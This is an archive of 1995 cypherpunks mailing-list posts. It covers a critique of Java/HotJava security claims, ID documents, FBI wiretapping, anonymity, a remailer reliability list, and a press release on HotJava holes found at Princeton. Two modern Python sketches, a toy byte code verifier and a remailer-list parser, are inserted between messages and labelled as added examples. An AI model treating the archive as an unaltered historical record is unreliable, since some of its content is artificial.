> and C++. Rather, memory layout is deferred to run-time, and will
> potentially differ depending on the characteristics of the hardware
> and software platforms on which the Java language system is
> executing. The Java interpreter references memory via symbolic
> "handles" that are resolved to real memory addresses at run time. Java
> programmers can't forge pointers to memory, because the memory
> allocation and referencing model is completely opaque to the
> programmer and controlled entirely by the underlying run-time system.

Just because it is opaque, doesn't mean you can't happen across a valid
(but perhaps undesirable) handle.  Sounds like a good issue for attack
by crypto-types.  How do we guess the handle of the disk IO routines?

> Very late binding of structures to memory means that programmers can't
> infer the physical memory layout of a class by looking at its
> declaration. By removing the C/C++ memory layout and pointer models,
> the Java language has eliminated the programmer's ability to get
> behind the scenes and manufacture pointers to memory. These features
> must be viewed as positive benefits rather than a restriction on the
> programmer, because they ultimately lead to more reliable and secure
> applications.

Is the language un-predictable? The same program executes differently
each time? A pseudo-random allocation? What is the technique used to
implement this, and why should we believe it is in fact secure in some
sense.  And if so, in what sense?

> The Byte Code Verification Process
> 
> What about the concept of a "hostile compiler"? Although the Java
> compiler ensures that Java source code doesn't violate the safety
> rules,

What are these "safety rules"?  No reference to them in this document!

> when an application such as the HotJava web browser imports a
> code fragment from anywhere, it doesn't actually know if code
> fragments follow the Java language rules for safety--the code may not
> have been produced by a known-to-be trustworthy Java compiler. In such
> a case, how is the Java run-time system on your machine to trust the
> incoming byte code stream? The answer is simple--it doesn't trust the
> incoming code, but subjects it to byte code verification.
> 
> The tests range from simple verification that the format of a code
> fragment is correct, to passing through a simple theorem prover to
> establish that the code fragment plays by the rules--that it doesn't
> forge pointers, it doesn't violate access restrictions, and it
> accesses objects as what they are (for example, that "InputStream"
> objects are always used as "InputStreams" and never as anything
> else). A language that is safe, plus run-time verification of
> generated code, establishes a base set of guarantees that interfaces
> cannot be violated.

Wait a minute.  If it's so safe, what code can possibly be sent in that
would cause a violation? If the prover is so simple, how can it show
things (e.g., program correctness) in real-time on a PC that the rest of
the world can't show with supercomputers over extended periods? What
EXACTLY are these things doing, and why should we believe they are safe?

> The Byte Code Verifier
> 
> The last phase of the byte code loader is the verifier. It traverses
> the byte codes, constructs the type state information, and verifies
> the types of the parameters to all the byte code instructions.


> The illustration [see the HTML] shows the flow of data and control
> from Java language source code through the Java compiler, to the byte
> code verifier and hence on to the Java interpreter. The important
> issue is that the Java class loader and the byte code verifier make no
> assumptions about the primary source of the byte code stream--the code
> may have come from the local system, or it may have travelled halfway
> around the planet. The byte code verifier acts as a sort of
> gatekeeper. The byte code verifier ensures that the code passed to the
> Java interpreter is in a fit state to be executed and can run without
> fear of breaking the Java interpreter.

So there are byte code sequences that can break the interpreter!

> Imported code is not allowed to
> execute by any means until after it has passed the verifier's
> tests. Once the verifier is done, a number of important properties are
> known:
> 
>       There are no operand stack overflows or underflows

Not so easily proven, is it?

>       The types of the parameters of all byte code instructions are
> 	known to always be correct

Huh? I thought you couldn't have incorrect types.  Do they mean that you
can have incorrect types but that they are detected by the verifier at
load time?

>       No illegal data conversions are done, like converting integers
> 	to pointers

How about legal ones - like converting integers to pointers via case
statements?

>       Object field accesses are known to be legal--private or public
> 	or protected

What exactly does this mean?

> While all this checking appears excruciatingly detailed, by the time
> the byte code verifier has done its work, the Java interpreter can
> proceed knowing that the code will run securely. Knowing these
> properties makes the Java interpreter much faster, because it doesn't
> have to check anything.  There are no operand type checks and no stack
> overflow checks. The interpreter can thus function at full speed
> without compromising reliability.

Can computers actually "know" anything?

No runtime checking whatsoever.  Get past the supposed verifier, and you
have free run of the machine.  A single verifier bug or inadequacy, and
the world is unsafe for electronic commerce.  And has the Java code been
verified to prove the claimed properties?  Against what criteria?  Where's
the beef?

> Security Checks in the Class Loader
> 
> After incoming code has been vetted and determined clean by the byte
> code verifier, the next line of defense is the Java class loader. The
> environment seen by a thread of execution running Java byte codes can
> be visualized as a set of classes partitioned into separate name
> spaces. There is one name space for classes that come from the local
> file system, and a separate name space for each network source.
> 
> When a class is imported from across the network it is placed into the
> private name space associated with its origin. When a class references
> another class, it is first looked for in the name space for the local
> system (built-in classes), then in the name space of the referencing
> class.  There is no way that an imported class can "spoof" a built-in
> class. Built-in classes can never accidentally reference classes in
> imported name spaces--they can only reference such classes
> explicitly. Similarly, classes imported from different places are
> separated from each other.

But they can explicitly reference each other? I can only explicitly open
a file called command.com on your PC?

> Security in the Java Networking Package
> 
> Java's networking package provides the interfaces to handle the
> various network protocols (FTP, HTTP, Telnet, and so on). This is your
> front line of defense at the network interface level. The networking
> package can be set up with configurable levels of paranoia. You can:
> 
>       Disallow all network accesses 
> 
>       Allow all network accesses 
> 
>       Allow network accesses to only the hosts from which the code was
> 	imported
> 
>       Allow network accesses only outside the firewall if the code
> 	came from outside

Who wants to bet that 99+% of all users configure "Allow all network
accesses".  Hot Java today is defaulted to this state. 

> Applet-specific security: (written for the 1.0a3 release of
> HotJava(tm)... there will be a rewrite for the 1.0b release when that
> occurs.  I'm assuming, perhaps incorrectly, that the Netscape
> implementation is similar.  As I understand it, they licensed the HJ
> code from Sun, so I think it's all very close to the truth.)
> 
> (http://java.sun.com/1.0alpha3/doc/security/security.html)
> 
> [ A rehash of the above text, snipped ]
> 
> Security level four: protecting the file system and network access
> 
> HotJava enforces security policies confident that its security
> interfaces are secure.

In other words, it assumes the other three levels worked properly.
If they don't, you're screwed.

> The three lower levels of security guarantee
> that all local classes, e.g., the file access primitives, are
> themselves protected from being supplanted, replaced, or extended by
> imported code.

You're screwed.

> The file access primitives implement an access control list that
> controls read and write access to files by imported code (or code
> invoked by imported code). The defaults for these access control lists
> are very restrictive[*]. If an attempt is made by a piece of imported
> code to access a file to which access has not been granted, a dialog
> box pops up to allow the user to decide whether or not to allow that
> specific access. These security policies err on the conservative side
> in order to ensure maximum security. This conservative approach may
> make writing some applets more difficult or awkward.

By default - ask the user.  That's restrictive? Please press the OK
button to have our free Lotus update loaded into your computer.

> For network security, HotJava provides a variety of mechanisms that
> can provide information about the trustworthiness of imported
> code. These mechanisms cover a wide range of possibilities. At the
> simple end the system can check on the origin of a code fragment to
> determine if it came from inside or outside a firewall.  At the
> sophisticated end of the range a mechanism exists whereby public keys
> and cryptographic message digests can be securely attached to code
> fragments that not only identify who originated the code, but
> guarantee its integrity as well. This latter mechanism will be
> implemented in future releases.

So today, if the admin specifies the proper IP address ranges when
loading Java into each computer in the network, and if no user ever
installs Java on their own, "code" downloads from external machines
may be stopped - unless the user says OK.

> The security policies implemented by the runtime system can be
> dynamically adjusted based on the information available concerning the
> origin of a code fragment. The Socket class provides such an example.
> 
> The Socket class implements security policies that are adjusted to
> reflect the trustworthiness of the code that invoked it, and
> transitively, the code that invoked the invoker. The information about
> what code began the chain of execution is available to the class in
> the form of which namespace contains the invoking code and what
> parameters are associated with that class. The class loader puts the
> classes it has loaded in a specific namespace, allowing the Socket
> class to determine the network host from which a class is loaded.
> 
> Knowing the network host allows the HotJava security mechanism to
> determine whether the class originated inside or outside a
> firewall. Knowledgable users of HotJava can decide which category of
> hosts to trust when loading executable code.

How about the more than 99.99% of users who are not knowledgable of HotJava?

> For example, the Socket
> class can implement the policy of only allowing new connections to be
> created that terminate at the host from whence the code was
> loaded. This restriction means that code loaded from outside a
> firewall cannot connect to other machines on the net behind the
> firewall.

Unless that machine acts as a gateway for further processing.

> Code that comes from more trusted sources can be allowed
> more freedom to make connections to other machines. As an additional
> defense against untrusted sources HotJava's security can be set to
> prevent any code from being loaded. The level of security is
> configurable by HotJava users.

The user dictates the security policy.  Any user in your site can
potentially, through error or omission or intent, open up a hole to your
entire network by accidentally pressing the OK button one time or by
setting a configuration parameter incorrectly.  And your firewall will
not save you.

ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF.

P.S.

When: Tuesday, November 7, 8AM
Where: The Hilton, Washington D.C. (the CSI conference)
The talk: 50 Ways to Attack Your World Wide Web Systems

If you want a chance to heckle - be there.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
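
The verifier properties quoted in the message above (no operand stack overflows or underflows, parameter types known, no integer-to-pointer conversion) are checked statically by tracking a type state per instruction. A sketch of that check over an invented toy instruction set follows; it is an added example, not part of the original message and not Sun's verifier, and the opcode names, `verify` and `check` are assumptions made for illustration.

```python
from collections import deque


class VerifyError(Exception):
    """Raised when a toy method body fails static verification."""


# opcode -> (types popped, types pushed). "I" = int, "A" = object reference,
# "*" = any single value. This instruction set is invented for the example.
EFFECTS = {
    "iconst":  ((), ("I",)),
    "aconst":  ((), ("A",)),
    "iadd":    (("I", "I"), ("I",)),
    "pop":     (("*",), ()),
    "ifeq":    (("I",), ()),      # pop an int, branch if it is zero
    "goto":    ((), ()),
    "ireturn": (("I",), ()),
    "areturn": (("A",), ()),
}
BRANCHES = ("goto", "ifeq")
RETURNS = ("ireturn", "areturn")


def verify(code, max_stack):
    """Abstractly execute `code` once per instruction, tracking only the
    types on the operand stack. Returns {pc: stack types on entry}."""
    if not code:
        raise VerifyError("empty method body")
    states = {0: ()}              # stack is empty on method entry
    work = deque([0])
    while work:
        pc = work.popleft()
        stack = states[pc]
        op, *args = code[pc]
        if op not in EFFECTS:
            raise VerifyError(f"pc {pc}: unknown opcode {op}")
        if op in BRANCHES and not (len(args) == 1 and isinstance(args[0], int)):
            raise VerifyError(f"pc {pc}: {op} needs one integer target")
        pops, pushes = EFFECTS[op]
        if len(stack) < len(pops):
            raise VerifyError(f"pc {pc}: stack underflow in {op}")
        keep = len(stack) - len(pops)
        for want, have in zip(pops, stack[keep:]):
            if want != "*" and want != have:
                raise VerifyError(f"pc {pc}: {op} expects {want}, found {have}")
        after = stack[:keep] + pushes
        if len(after) > max_stack:
            raise VerifyError(f"pc {pc}: stack overflow in {op}")
        if op in RETURNS:
            successors = []
        elif op == "goto":
            successors = [args[0]]
        elif op == "ifeq":
            successors = [pc + 1, args[0]]
        else:
            successors = [pc + 1]
        for nxt in successors:
            if not 0 <= nxt < len(code):
                raise VerifyError(f"pc {pc}: control flow leaves the method")
            if nxt not in states:
                states[nxt] = after
                work.append(nxt)
            elif states[nxt] != after:
                # Two paths reach nxt with different stack shapes. Rejecting
                # this is what rules out a loop that grows the stack forever.
                raise VerifyError(f"pc {nxt}: inconsistent stack at merge point")
    return states


def check(code, max_stack):
    """Return "ok" or the reason the method was rejected."""
    try:
        verify(code, max_stack)
        return "ok"
    except VerifyError as err:
        return str(err)


# Constructed sample methods (not real Java byte code).
ADD = [("iconst", 2), ("iconst", 3), ("iadd",), ("ireturn",)]
UNDERFLOW = [("iconst", 1), ("iadd",), ("ireturn",)]
INT_AS_REF = [("iconst", 0x1234), ("areturn",)]   # int used as a reference
GROWING_LOOP = [("iconst", 1), ("goto", 0)]       # pushes on every iteration
BRANCH = [("iconst", 0), ("ifeq", 4), ("iconst", 1), ("goto", 5),
          ("iconst", 2), ("ireturn",)]

if __name__ == "__main__":
    for name in ("ADD", "UNDERFLOW", "INT_AS_REF", "GROWING_LOOP", "BRANCH"):
        print(f"{name:13s} {check(globals()[name], max_stack=2)}")
```

The check establishes only these structural properties and says nothing about what the code computes; an interpreter that drops its run-time checks is relying on the checker itself being correct.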




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 6 Nov 1995 19:35:01 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <199511060208.VAA14123@panix.com>
Message-ID: <Pine.SUN.3.91.951106061220.8722D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 Nov 1995, Duncan Frissell wrote:

> >> Consider this: most people in the U.S. do not have a "credential" that
> >> shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
> >> passports.)
> 
> My passport is always close at hand.  I love an unchallengeable credential
> that has neither my address nor my SS# on it.  I also carry my birth
> certificate which I use for most non-driving interactions.  It doesn't have
> much useful info on it.  Secured credit cards which can be obtained in any
> name are also handy.  

I have often found and come across considerable problems using a 
passport, local or foreign, as identification.  Many establishments 
simply refuse to accept them, as if they are inferior somehow to the 
non-standardized frequently forged almighty driver's license.  This is 
mostly ignorance and a lack of common reference, as few Americans 
actually HAVE these documents, or have even SEEN them.  (No, I'm not 
kidding).  I found this particularly distressing in D.C.  To some degree 
it's institutional, where recording a "drivers license number" on some 
form becomes problematic for the $5.50 an hour clerk who can't find the 
field "driver's license number" anywhere on the passport.

While I just take my business elsewhere when that is possible, I think 
it's interesting to note how desperately people cling to the social 
security number and completely inept identifications like state issued 
licenses as if to let go would mean a descent into the bleeding hell of 
anarchy.  (In its popularly assumed and feared form)


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Mon, 6 Nov 1995 23:53:58 +0800
To: jya@pipeline.com
Subject: Re:  Kallstrom Calls All Calls Tappable
Message-ID: <9511061431.AA15525@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>   James Kallstrom, assistant FBI director in charge of the
>   New York field division, argues that the proposal would in
>   fact reduce the FBI's surveillance authority. "Today ... we
>   could tap all the phones in the United States," he said,
>   referring to older, pre-digital technology. Under the plan,
>   the FBI's surveillance ability would shrink to a maximum of
>   1 percent of simultaneous telephone calls from any one
>   telephone switch, he said.

Doublespeak.  2 legs good 4 legs better.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 19:58:37 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID: <9511061141.AA16901@all.net>
MIME-Version: 1.0
Content-Type: text


Anonymous wrote:
> On Sat, 4 Nov 1995 don@cs.byu.edu wrote:
> 
> > An anonymous complainer writes:
> > 
> > >Well, Perry, my opinion is that there is far too much noise on this list 
> > >as it is.  I have already seen my words drowned out by bellyaching over 
> > >next to nothing.
> > 
> > POT-KETTLE-BLACK.
> > 
> > Also, since nothing you've written (in your commentary, as opposed to
> > anonymous announcements or releases that most people use anonymity for
> > here) indicates that you're using anonymity for any particular reason,
> 
> Hmmm, I'm not sure that anyone has an inherent right to question WHY a
> person seeks moments of anonymity or privacy.  I don't believe that
> anyone should be placed on the defensive, for *choosing* to maintain
> some semblance of a personal life, or wishing to maintain some
> illusions that they might still have some shred of personal privacy
> left.  Hopefully, we can still leave a man with his dignity.

In the United States, we have the right to express whatever view we
wish, so long as it doesn't endanger others (e.g., incite to riot,
scream "fire" in a crowded theater when there is no fire, etc.). 
Everyone has an inherent right to question why a person seeks moments of
anonymity or privacy. 

As far as people being placed on the defensive, if you want to be
defensive it's your choice.  In terms of understanding what you say,
without understanding the WHY, it's harder to understand and evaluate
the WHAT.

When people use the cover of anonymity to make attempts at character
assassination, the WHY certainly seems a central issue.  Is it that the
people who post such attacks are cowards? Do they have ulterior motives?
Or are they simply upset about something else in their life and taking
it out on others.  Are they using anonymity to prevent responsibility or
association? Are they afraid of retribution?  Without understanding the
motive, their postings cannot be truly understood.

> I should not have to defend my right to present my ideas as I believe
> are appropriate to the circumstances.  My choice to present the idea,
> that an entire economic sector needs to carefully reevaluate their
> strategic choices, and their discovered hidden security attitudes -- will 
> stand or fall strictly on its merits.  The debate is not advanced in any 
> way by attaching a reputation to the question.

You don't have to defend anything, but the debate is certainly advanced
by attaching reputation.  If you were an investment banker and making
major investment decisions on a daily basis without understanding the
issue, it would bring a very different understanding to our reading than
if you were a high school student.  The reason is that content without
context is devoid of meaning.  The more context we have, the more
meaning we can attribute to your content. 

> Like any other person, I have my skeletons, and I have my regrets.  I 
> certainly have unfinished, unresolved, issues that I need to tend to.  In 
> that sense, I am no different than any other man.  I also realize that 
> ultimately, I'll have to come forward from behind the veil of secrecy 
> which is provided to me.  

Why wait? We have a special on truth available only today.  Tell us who
you are and we will forgive all past sins (mortal sins not included,
void where prohibited).

> This I will do, after I have reconciled my own security considerations.

Ah - probably void there.

> Please allow me the boundary and dignity to choose when, where, and in 
> what form I choose to reveal myself.  That inherent right, should be
> extended to any man, and no man should be called to account for his 
> desire to maintain his personal privacy, no matter how arbitrary his
> reasons.

Your privacy is yours, but the content of your messages continues to be
degraded by the lack of adequate context for their interpretation.

> Especially when he comes forward to challenge Goliath.

David had only a slingshot.  An anonymous remailer would have reduced
his risks too.

...

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 6 Nov 1995 23:57:18 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199511061450.GAA24989@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo hroller syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hacktic  remailer@utopia.hacktic.nl       *********+**     8:54  99.98%
portal   hfinney@shell.portal.com         ###--###**--    46:06  99.98%
ideath   remailer@ideath.goldenbear.com   --.-----_.-- 10:46:11  99.98%
wmono    wmono@valhalla.phoenix.net       ************    12:41  99.97%
ecafe    remail@ecafe.org                 *##*#*##*#*#     1:06  99.97%
alumni   hal@alumni.caltech.edu           *+#--***+*--    46:01  99.97%
robo     robo@c2.org                      #--*##.#*#*#    10:10  99.92%
spook    remailer@valhalla.phoenix.net    * *+********    12:11  99.92%
penet    anon@anon.penet.fi               --+++-----+   3:25:44  99.90%
replay   remailer@replay.com               * ******+**     7:06  99.88%
mix      mixmaster@remail.obscura.com      ----------   1:59:30  99.75%
rmadillo remailer@armadillo.com           ++++++++++ +    39:58  99.58%
bsu-cs   nowhere@bsu-cs.bsu.edu            #-+#* *##++    13:47  99.23%
ford     remailer@bi-node.zerberus.de     ________ .   78:53:54  99.04%
syrinx   syrinx@c2.org                    __ .+-+--+++ 15:25:24  98.98%
flame    remailer@flame.alias.net          **+***+ +**    22:20  98.00%
vishnu   mixmaster@vishnu.alias.net        +*******-*+    22:47  97.99%
rahul    homer@rahul.net                  +#*****+-**+     9:18  99.95%
c2       remail@c2.org                    +-- **.*  -     46:46  86.40%
extropia remail@extropia.wimsey.com       - -..-       10:09:23  31.33%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
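
A parser for the list format above, as an added example that is not part of the original message or of premail: it reads the capability lines (including the trailing-period "pgp." convention), the shared-operator groups and the statistics table, then picks a chain that uses at most one remailer per group. The sample lines are copied from the list above; the function names, the reading of latency as [hours:]minutes:seconds and the treatment of a blank history slot as "no data" are assumptions.

```python
import re

# Sample input: a subset of the lines in the list above, copied unchanged.
CAPS_TEXT = '''\
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
'''
GROUPS_TEXT = "(robo hroller syrinx c2)\n(flame hacktic replay)\n(alumni portal)\n"
STATS_TEXT = '''\
hacktic  remailer@utopia.hacktic.nl       *********+**     8:54  99.98%
portal   hfinney@shell.portal.com         ###--###**--    46:06  99.98%
wmono    wmono@valhalla.phoenix.net       ************    12:41  99.97%
ecafe    remail@ecafe.org                 *##*#*##*#*#     1:06  99.97%
alumni   hal@alumni.caltech.edu           *+#--***+*--    46:01  99.97%
robo     robo@c2.org                      #--*##.#*#*#    10:10  99.92%
spook    remailer@valhalla.phoenix.net    * *+********    12:11  99.92%
rmadillo remailer@armadillo.com           ++++++++++ +    39:58  99.58%
syrinx   syrinx@c2.org                    __ .+-+--+++ 15:25:24  98.98%
c2       remail@c2.org                    +-- **.*  -     46:46  86.40%
'''

CAPS_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";\s*$')
# The history column may contain blanks, so it is matched lazily between the
# address and the latency/uptime pair anchored at the end of the row.
STATS_RE = re.compile(
    r'^(\S+)\s+(\S+@\S+)\s(.*?)\s+((?:\d+:)?\d{1,2}:\d\d)\s+(\d+\.\d+)%\s*$')


def parse_caps(text):
    """Parse the $remailer{"name"} = "<address> flag flag ..."; lines."""
    out = {}
    for line in text.splitlines():
        m = CAPS_RE.match(line.strip())
        if m:
            flags = m.group(3).split()
            out[m.group(1)] = {
                "address": m.group(2),
                "caps": {f.rstrip(".") for f in flags},
                "key_by_short_name": "pgp." in flags,  # period after "pgp"
            }
    return out


def pgp_key_id(name, entry):
    """Key ID to encrypt to: short name if listed as "pgp.", else the address."""
    if "pgp" not in entry["caps"]:
        return None
    return name if entry["key_by_short_name"] else entry["address"]


def latency_seconds(text):
    """Assumption: '8:54' is minutes:seconds, '15:25:24' is hours:minutes:seconds."""
    secs = 0
    for part in text.split(":"):
        secs = secs * 60 + int(part)
    return secs


def prompt_fraction(history):
    """Share of recorded pings answered within an hour ('#' or '*' in the key)."""
    recorded = [c for c in history if c != " "]  # assumption: blank = no data
    return sum(c in "#*" for c in recorded) / len(recorded) if recorded else 0.0


def parse_stats(text):
    out = {}
    for line in text.splitlines():
        m = STATS_RE.match(line)
        if m:
            name, addr, hist, lat, up = m.groups()
            out[name] = {"address": addr, "history": hist.strip(),
                         "latency_s": latency_seconds(lat), "uptime": float(up)}
    return out


def parse_groups(text):
    """Map each remailer name to the index of its shared machine/operator group."""
    group_of = {}
    for idx, members in enumerate(re.findall(r"\(([^)]*)\)", text)):
        for name in members.split():
            group_of[name] = idx
    return group_of


def pick_chain(stats, group_of, length, min_uptime, max_latency_s,
               caps=None, require=()):
    """Most reliable remailers first, never two from the same group."""
    need = set(require)
    names = [n for n, s in stats.items()
             if s["uptime"] >= min_uptime and s["latency_s"] <= max_latency_s
             and (not need or (caps and n in caps and need <= caps[n]["caps"]))]
    names.sort(key=lambda n: (-stats[n]["uptime"], stats[n]["latency_s"]))
    chain, used = [], set()
    for name in names:
        group = group_of.get(name)
        if group in used:
            continue  # a second hop under the same operator adds no protection
        chain.append(name)
        if group is not None:
            used.add(group)
        if len(chain) == length:
            break
    return chain
```
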




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 7 Nov 1995 01:56:41 +0800
To: cypherpunks@toad.com
Subject: Re: lp ?
Message-ID: <199511061539.HAA04245@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Shields quoted and wrote:
> Anonymous <nobody@REPLAY.COM> wrote:
> > > -- then through the same
> > >  Vienna, Virginia (USA) site ...
> 
> ...a major router at a major interconnect run by UUNET, a major provider.
> datasrv apparently contracted with UUNET for traffic.  Naturally it would
> go through their network, which is centered in the US.

So, if this person was sending cryptographic codes from Switzerland
to Israel, the code would have been imported to the US, then exported
by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
but it might be something to threaten UUNET with if one of their Northern
Virginia neighbors ever wanted something they couldn't get otherwise.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 7 Nov 1995 01:00:50 +0800
To: cypherpunks@toad.com
Subject: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE
Message-ID: <199511061552.HAA06343@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release
Date: Nov 6th, 1995
Contact: Sameer Parekh 510-601-9777 sameer@c2.org

PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE

Two Princeton University grad students, Dan Wallach and Drew Dean,
recently discovered holes in Sun Microsystems' HotJava web browser. In
response to this finding, Community ConneXion, well known for offering
rewards for exposing holes in internet security products, has decided
to award them with a t-shirt and expand the Community ConneXion Hack
line of promotions to include Java and Java-related products.

Sun's Java product is alleged to allow people browsing the
World-Wide-Web to execute programs on their own computers without
worrying about whether or not the programs were viruses or not. The
holes Wallach and Dean found show that there are a few things in the
HotJava alpha implementation of the Java language which make viruses
and other malicious programs possible within the alpha HotJava
web browser.

"We were very impressed with the HotJava concept, so we thought it
would be good to poke around their implementation," said Wallach.
"While we did find some interesting holes, we believe these can be
addressed and Java could make a good standard for remote code on the
Web, if an effective security policy is defined."

Wallach and Dean released their findings initially in the RISKS
Digest, and plan to publish a paper detailing their results. The holes
they found make it possible for a malicious applet to set things up so
as to be able to monitor or modify all of a given web-surfer's
activity, after they ran the malicious applet exploiting the holes. By
doing so the applet may make it possible to violate a user's privacy by
revealing to a third party their web traffic.

The holes they found exist only in the alpha release of HotJava. The
beta release, which is the version found in the widely-used Netscape
Navigator 2.0b1J is not vulnerable to these attacks.

"I don't want to be in the t-shirt business," said Sameer Parekh,
President of Community ConneXion, "but we felt that these students'
work deserved a t-shirt. Java has great potential for making the
Internet much more powerful than it already is. It is very important
that we examine Java and make sure that we can trust it." Community
ConneXion, in addition to this Hack Java t-shirt promotion, is
offering t-shirts to people who find holes in Netscape, Microsoft, and
DigiCash.

Information about the Hack Java promotion is available from
http://www.c2.org/hackjava/.

